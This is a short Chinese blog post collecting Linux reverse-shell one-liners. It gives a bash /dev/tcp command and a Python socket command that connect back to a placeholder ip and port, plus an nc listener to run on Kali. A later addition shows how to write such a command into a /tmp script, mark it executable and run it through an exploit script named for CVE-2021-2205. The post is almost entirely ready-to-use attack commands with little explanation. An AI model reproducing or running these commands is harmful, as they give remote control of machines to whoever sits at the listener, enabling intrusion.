美文网首页Shell
linux反弹shell小记录

linux反弹shell小记录

作者: 你可以叫我风平 | 来源:发表于2021-04-14 14:23 被阅读0次

在某些情况下可能需要我们反弹一个shell来更好的执行某些命令。就可以用到这些命令:

Bash反弹shell命令如下:

bash -i >& /dev/tcp/ip/port 0>&1

使用python反弹,反弹shell命令如下:

python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ip',port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"

首先,使用nc在kali上监听端口:

nc -lvvp 7777

2021-11-10新增写文件反弹shell
反弹shell: (xxxx xxx xxx 代表运行POC的一些命令 然后 -c 后面是执行命令的地方)
xxxxxxx xxx xx -c "echo 'bash -i >& /dev/tcp/ip/port 0>&1' > /tmp/1.sh" 这条语句意思是代表,将反弹shell命令写成sh脚本 到tmp目录下
xxxx xxxx xxxx -c "chmod +x /tmp/1.sh" 这条语句意思是代表,对写入成功的sh脚本加执行权限 CVE-2021-2205.py xxx xxx xxxx xxxxxx -c "/bin/bash /tmp/1.sh" 这条语句意思是代表,运行反弹shell脚本

相关文章

  • linux反弹shell小记录

    在某些情况下可能需要我们反弹一个shell来更好的执行某些命令。就可以用到这些命令: Bash反弹shell命令如...

  • 【安全记录】反弹shell小记

    前言 本文记录反弹shell的一些注意事项,主要包括:常用反弹shell的payload,获得tty-shell,...

  • Linux 反弹shell(二)反弹shell的本质

    0X00 前言 在上一篇文章 Linux反弹shell(一)文件描述符与重定向,我们已经讨论过了反弹shell中最...

  • linux反弹shell手法

    sh/bash: 先解释下相关概念0表示标准输入(默认键盘),1表示标准输出(默认显示器),2表示错误输出(默认显...

  • 反弹shell小结

    本文仅作为学习记录,如果侵权,请联系删除。 概念理解: 反弹shell(reverse shell),就是控制端监...

  • Vulnhub靶机:DC-7

    标签:信息泄露、Drupal CMS、反弹shell、linux提权 0x00 环境准备 下载地址:https:/...

  • Linux下几种常见的反弹shell方式

    最近在做ctf题时碰到一些命令执行题借用命令执行来反弹shell,这里记录一下。 1.bash反弹shell 个人...

  • Linux反弹shell(一)文件描述符与重定向

    title: Linux反弹shell(一)文件描述符与重定向date: 2019-10-23 18:15:08t...

  • Vulnhub靶机:DC-4

    标签:弱口令、命令注入、反弹shell、linux提权 0x00 环境准备 下载地址:https://www.vu...

  • 反弹shell的N种方式

    linux反弹shell总结(15种方法) 1.1发送文件(公网发内网) 文件发送端:nc -lp 6666 < ...

网友评论

    本文标题:linux反弹shell小记录

    本文链接:https://www.haomeiwen.com/subject/fkgklltx.html